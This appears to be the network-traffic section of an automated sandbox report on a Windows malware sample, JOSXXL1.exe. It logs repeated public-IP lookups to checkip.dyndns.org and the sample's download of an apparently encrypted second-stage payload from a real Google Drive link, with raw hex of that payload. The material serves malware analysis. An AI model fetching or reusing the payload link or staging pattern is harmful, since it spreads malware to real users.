                                                                                                      Oct 26, 2024 23:57:18.523883104 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:18 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: caf0531f442086a2cbf6c6367a2c93c8
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>
                                                                                                      Oct 26, 2024 23:57:20.209976912 CEST127OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Oct 26, 2024 23:57:20.371098042 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: b98f0aa4cab169088238d336be5cc52d
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.461908193.122.130.0803492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 26, 2024 23:57:21.186281919 CEST127OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Oct 26, 2024 23:57:21.848947048 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 80a85bcace7f28602421dbe53bb7312a
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.461919193.122.130.0803492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 26, 2024 23:57:22.639153004 CEST127OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Oct 26, 2024 23:57:23.311886072 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:23 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 3771b7856e31be804c72bf989c764894
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.461927193.122.130.0803492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 26, 2024 23:57:24.147428989 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 26, 2024 23:57:24.929389954 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:24 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: daf86f86055975f57e58ea89aa4b0ebe
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.461939193.122.130.0803492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 26, 2024 23:57:25.718627930 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 26, 2024 23:57:26.380525112 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: e7450ed6ab6c6479b8473d41a51f385b
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.461950193.122.130.0803492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 26, 2024 23:57:27.159492970 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 26, 2024 23:57:27.838432074 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: e26ca40bd8a5ae27d24e236f222ca039
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.461958193.122.130.0803492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 26, 2024 23:57:28.635612011 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 26, 2024 23:57:29.307995081 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:29 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 0438c5c15c6bebe98b600e160ea76bca
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.461970193.122.130.0803492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 26, 2024 23:57:30.098470926 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 26, 2024 23:57:30.792260885 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:30 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 9629954719db26f968ddc2c33c9db823
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.461847142.250.185.2384433492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-26 21:57:11 UTC216OUTGET /uc?export=download&id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2 HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-10-26 21:57:11 UTC1610INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Sat, 26 Oct 2024 21:57:11 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: script-src 'nonce-O0TpBC-RwQLqnQBFKUsLLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.461854142.250.181.2254433492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-26 21:57:12 UTC258OUTGET /download?id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-26 21:57:15 UTC4907INHTTP/1.1 200 OK
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Security-Policy: sandbox
                                                                                                      Content-Security-Policy: default-src 'none'
                                                                                                      Content-Security-Policy: frame-ancestors 'none'
                                                                                                      X-Content-Security-Policy: sandbox
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                                                      Cross-Origin-Resource-Policy: same-site
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Disposition: attachment; filename="XADxc144.bin"
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Allow-Credentials: false
                                                                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 275520
                                                                                                      Last-Modified: Wed, 23 Oct 2024 17:37:54 GMT
                                                                                                      X-GUploader-UploadID: AHmUCY35Inz-IHd0lpbVRmAq5usplkGviM_86Ze_nD1it84WHjZW2FPfGMmrhcEmHsRXSMhCGmk
                                                                                                      Date: Sat, 26 Oct 2024 21:57:14 GMT
                                                                                                      Expires: Sat, 26 Oct 2024 21:57:14 GMT
                                                                                                      Cache-Control: private, max-age=0
                                                                                                      X-Goog-Hash: crc32c=pJsuIw==
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close
                                                                                                      2024-10-26 21:57:15 UTC4907INData Raw: e9 11 4e a6 f3 bd 4f f8 a8 41 8f 9b 63 10 0e e9 a8 71 8d d4 48 17 2b 5f 18 f9 d9 30 4e ce eb 03 84 b2 5f b9 2f 69 4c 31 2f 34 5e 41 28 1c 5c ff be 87 9e 4d 58 73 7b 02 a8 67 e6 b5 c0 48 d5 f6 2c 49 20 c0 2f e5 8a 7b 6a 04 df 05 0d 19 81 4b 6b 6e 98 44 af 3d b6 6c c6 12 ba e0 4e c7 0b bc f9 5c 3d a0 53 a5 1e c5 03 38 02 df 48 1c f0 46 c5 5d dd 3c 0a 39 38 c4 6b da ec c3 6c bf dc 55 c8 0d 40 5b 97 b9 bc 54 91 39 0c f7 05 95 0a 6d 45 9b ad 1e 9a 50 ea b4 ca 74 8b a4 e9 7e 39 81 8f a6 55 40 ac fe 63 a4 a8 75 39 83 52 71 40 8d 66 5b 66 06 75 b4 3a 8e 46 41 28 ad 4b 07 32 a3 95 fb f2 11 28 f7 c6 f1 c1 30 b6 03 7b b5 32 c6 98 99 92 00 25 22 f1 dc 76 72 16 84 b1 0b 6b a7 6d 68 0a 8b 0f 70 30 76 69 a2 e5 18 55 22 2c b9 e7 49 55 74 25 8d e9 f8 ec 2a 50 7f 45 83 b0
                                                                                                      Data Ascii: NOAcqH+_0N_/iL1/4^A(\MXs{gH,I /{jKknD=lN\=S8HF]<98klU@[T9mEPt~9U@cu9Rq@f[fu:FA(K2(0{2%"vrkmhp0viU",IUt%*PE
                                                                                                      2024-10-26 21:57:15 UTC4890INData Raw: 59 ee ea 8b 1b 2d 9d 81 79 cb 88 1c 5d a3 ca e0 03 88 23 00 02 63 51 aa 38 84 4a 23 28 ad 41 d9 32 a3 ef be f2 50 28 f6 c5 f3 18 b5 26 3f 7b b5 32 f1 99 99 92 91 c4 22 f3 d3 7d 73 46 84 b1 15 6f a5 6d 7c 0a 26 0e 70 30 6d 67 9e e1 d0 54 02 2c b7 e7 09 51 74 25 8d a9 f8 ec 0a 50 7e 45 81 b0 d1 14 c4 9b f7 da 59 bf dd 2a 74 27 82 3b 77 6f 8e 86 10 6d a2 c4 57 2b f8 f4 a2 55 1d f4 fc c2 5f a9 38 06 10 95 d6 9d 5e 5c 70 10 6e 5c 92 ea fb e5 49 f7 be f7 22 83 8c 20 a9 49 f7 ce ea ba b8 04 ef c3 80 e8 b6 ef 9e 55 65 9f 42 40 5b fb fb 73 9e cf 3b e8 44 6a 85 66 34 9d 69 e2 6a 01 68 83 00 22 f7 eb 2f a3 dc 1c dc 37 b3 e7 c6 13 a8 6b b1 0f 26 0b 82 80 ab 12 ab fa 6e c7 6f 66 50 0b a9 28 0f 20 6d 55 0c 5d e7 75 be 09 0c b9 8b a1 bc dd b3 61 63 54 39 ba a3 5e c7 b6
                                                                                                      Data Ascii: Y-y]#cQ8J#(A2P(&?{2"}sFom|&p0mgT,Qt%P~EY*t';womW+U_8^\pn\I" IUeB@[s;Djf4ijh"/7k&nofP( mU]uacT9^
                                                                                                      2024-10-26 21:57:15 UTC1317INData Raw: 24 74 13 e0 94 8b 5f 09 b5 e4 23 8d 9a 94 35 4b f7 cf fb f0 b8 04 e1 b1 e6 ff d9 f9 88 7d ee 98 2d 2d 4d 05 f0 0f f1 de 3c db 78 6b f6 0f 34 89 9d f7 53 01 79 81 7b f5 84 81 25 8b 17 0f d9 3d a2 91 77 78 a8 61 a8 14 31 12 fa b8 c4 7e af 89 a7 c7 b1 62 3f de af 04 0d 31 7a 32 62 98 e7 7f b4 ab 20 bd e4 c8 d3 1b b9 6c b7 5a 28 a3 d4 f5 df a7 98 dc 09 b2 80 bb b8 bb 58 5e c4 21 75 ab 45 89 74 8b 2c 48 8f 06 c3 81 7a b4 6e 06 01 40 25 a5 d9 82 11 2e de 28 78 39 af 65 23 6e 53 3f 5c fb f5 42 06 ca 2d a0 31 1a f0 62 1a 0b ad 07 0c ac 05 73 db 28 2a 34 7d fe 99 a7 b0 5e 26 9c c0 40 be 54 35 83 d8 ab 43 fd 65 ef 17 29 3b 58 c1 d2 99 29 72 88 e7 f6 ff 9d 42 2e 41 fa d1 b8 82 26 d2 78 e5 bc a0 9b 6b 2e 04 0c 91 2d 1f 14 8b b6 c9 cd c2 fd 1c 91 1c fe 22 af cb eb 54
                                                                                                      Data Ascii: $t_#5K}--M<xk4Sy{%=wxa1~b?1z2b lZ(X^!uEt,Hzn@%.(x9e#nS?\B-1bs(*4}^&@T5Ce);X)rB.A&xk.-"T
                                                                                                      2024-10-26 21:57:15 UTC1378INData Raw: fd 6c 9e e3 06 ac 86 eb f7 9e d0 b6 a8 49 6f c4 28 5e fa d8 3d 9f b8 31 ee a1 ad a9 7b 7e 42 c3 36 ac b2 ab ea 8a 0b cc 2c aa 05 f2 ec ee 17 d3 6e 92 57 8e 26 3b 2c 86 12 bb c5 58 b5 ea ae f9 2c 9f 85 44 8d aa c5 03 32 a0 fa 50 6e a5 49 c5 2d 7f 19 13 47 00 c4 6b de 4e e6 f6 cd ed 56 c6 62 58 7d e2 0d b5 93 a3 a3 1b 93 be b4 5e 0f 2c c8 8d 62 e8 3f a5 b1 ab 19 a1 c7 88 6e 68 ee fb 82 26 04 fe 83 05 ca f8 62 48 a3 16 3a 3b e4 0b 34 08 72 79 c7 77 84 62 45 00 93 4b 07 34 a3 1b ae d7 39 50 f6 c5 fb 0b 96 26 4d 19 b5 32 cc 46 99 92 00 c5 5c c4 dd 7d 77 34 11 b3 15 1f b1 45 fd 0a 8b 05 66 ce 77 74 ba f0 3c 79 5e 31 34 a7 09 51 75 00 9b db c3 e3 0a 20 dd 60 96 98 b2 15 c4 91 8d fe 41 cd 98 25 74 57 65 1e 6e 10 ad b6 13 69 b1 e1 4d 59 92 fb a2 34 bf d1 cf df 75
                                                                                                      Data Ascii: lIo(^=1{~B6,nW&;,X,D2PnI-GkNVbX}^,b?nh&bH:;4rywbEK49P&M2F\}w4Efwt<y^14Qu `A%tWeniMY4u
                                                                                                      2024-10-26 21:57:15 UTC1378INData Raw: 02 3e 5d fa ab 95 d0 b9 c4 38 cc dc cf 63 03 a2 d4 16 fa 1a e2 31 de 3b 70 6e 2c e2 78 d1 cc 93 d2 f8 7e 26 e4 b3 29 60 70 ee 04 dd 03 1d a6 be e6 ea 03 3a 59 7b 83 9e 55 85 dd fe a0 c9 7d 71 b4 91 fa 2d 55 f7 37 f0 93 bf 14 44 12 5d fb e3 d5 e6 ea 52 ce a4 a6 37 96 ac 01 03 ae 0f 16 f6 ff c8 77 ef 0a c4 14 35 16 b2 34 01 2f 52 c3 b3 c6 ea 5f 19 ed fd 3f c8 42 a8 c2 9b 2d f7 08 a1 e8 5b 3a fe 39 ad 90 88 19 88 66 11 d5 a0 ef 35 8a e9 25 5e ff 2f 34 18 d0 59 27 ba e3 6e b9 0c 08 fb 0a 6a e9 74 5b 0a d2 89 94 cf bc bd f5 1a ac df 7d 48 f8 b4 a4 4f 69 c8 4a 5e 81 26 25 1d cb e9 0a ce ca e8 25 cb 02 3c 7e 93 47 cb 7f fd bd 30 67 f7 49 d2 f9 85 8e a8 4d 43 8d 0d 44 82 b2 3e e1 fe 93 cb be a1 9c 6a 7e 36 77 3b 31 c0 2c ef 9c 85 6f 17 d2 14 ff df 58 4b d3 6e 8e
                                                                                                      Data Ascii: >]8c1;pn,x~&)`p:Y{U}q-U7D]R7w54/R_?B-[:9f5%^/4Y'njt[}HOiJ^&%%<~G0gIMCD>j~6w;1,oXKn
                                                                                                      2024-10-26 21:57:15 UTC1378INData Raw: 21 80 f0 42 02 d9 23 d1 2a 78 3f 21 a3 fa 5b dc 69 5d d4 09 bb 87 f0 50 12 04 63 2d 39 5a f8 bc 58 16 ad 22 9c 5b 82 cf 77 8c cf dd 92 70 5f 82 43 a8 5c e8 98 fa 78 8c f6 89 ad 0e dd 79 a2 60 71 b4 4a e6 e4 62 4f 9c ef e7 f9 f1 f0 e4 72 28 2b 40 49 59 89 7f d3 0c b1 be 4c 4d 2e e7 e5 e4 ba b2 3d 7e 33 5f 80 77 ae 32 98 1d 24 d1 30 ea ac 97 83 74 9b 66 83 b4 6b 93 ab 1c 68 5b e4 57 a5 46 69 df f8 bb d4 05 f4 e2 ac 01 a5 f5 79 53 ab c2 f4 0e 20 ec bd 50 ff 43 a1 2d b0 e9 fa 33 65 a7 2f 54 75 3b d1 60 6e 18 a0 7e b2 f4 af 13 45 e3 13 49 99 7e 38 8b 63 70 4b 1b c9 67 f8 8e b7 d2 2e 36 e6 14 21 c3 49 52 57 4d cc d0 b9 6d fd fe 9a da a6 ae 1d d5 a8 f7 1d 28 a6 76 37 93 85 9b 3e d4 58 d5 5a 31 f3 b5 d1 cc 9d ac 11 11 f5 ee 11 06 7c 7c e7 10 dd 77 cc 47 cb e6 e0
                                                                                                      Data Ascii: !B#*x?![i]Pc-9ZX"[wp_C\xy`qJbOr(+@IYLM.=~3_w2$0tfkh[WFiyS PC-3e/Tu;`n~EI~8cpKg.6!IRWMm(v7>XZ1||wG
                                                                                                      2024-10-26 21:57:15 UTC1378INData Raw: d2 1e e7 49 75 4a 41 56 e1 c7 a4 e4 41 4f c5 5f 49 38 79 99 ea 10 36 5f f0 27 d2 77 03 18 f4 41 84 4e a9 99 ce ca 6b 1d ea 17 a8 80 52 7a 5b 0e e5 a4 90 a9 cf f1 63 1a 3c eb d7 fd 7b 02 b1 2f bf 28 e7 95 2f 55 2c f6 ec 2f 7e 79 86 eb 5f 92 04 36 da 12 ec ba 43 6c d5 5b 2c eb b0 2f b0 53 c6 c0 38 d0 e5 e1 f0 fe 37 92 14 58 a2 81 2c 98 4e ae 1f 2c 7a aa 8c 1f d7 cc a6 85 20 71 3c 41 8d 34 76 f2 d8 e9 96 47 03 c4 34 ac fe 77 ca 88 27 ae d2 9d 6d f9 60 c0 dd 81 33 3a 68 c5 6f 90 73 e3 ce e4 86 88 14 09 bb 35 2d ff 62 10 61 fe 5b db dc 8a 40 99 b2 75 68 60 5f 32 cd 99 41 43 bf 91 e4 4a 51 78 35 8a 07 1b 54 f4 2e 51 b9 b2 3c 1e df 32 cb 54 82 17 65 a9 88 07 dd b4 ac c3 21 3a a2 d8 6e 04 fa 6a 34 20 63 72 d9 58 16 d9 cf 9c 5b 86 bd e2 f0 fb ad 84 5c ac 17 41 a2
                                                                                                      Data Ascii: IuJAVAO_I8y6_'wANkRz[c<{/(/U,/~y_6Cl[,/S87X,N,z q<A4vG4w'm`3:hos5-ba[@uh`_2ACJQx5T.Q<2Te!:nj4 crX[\A
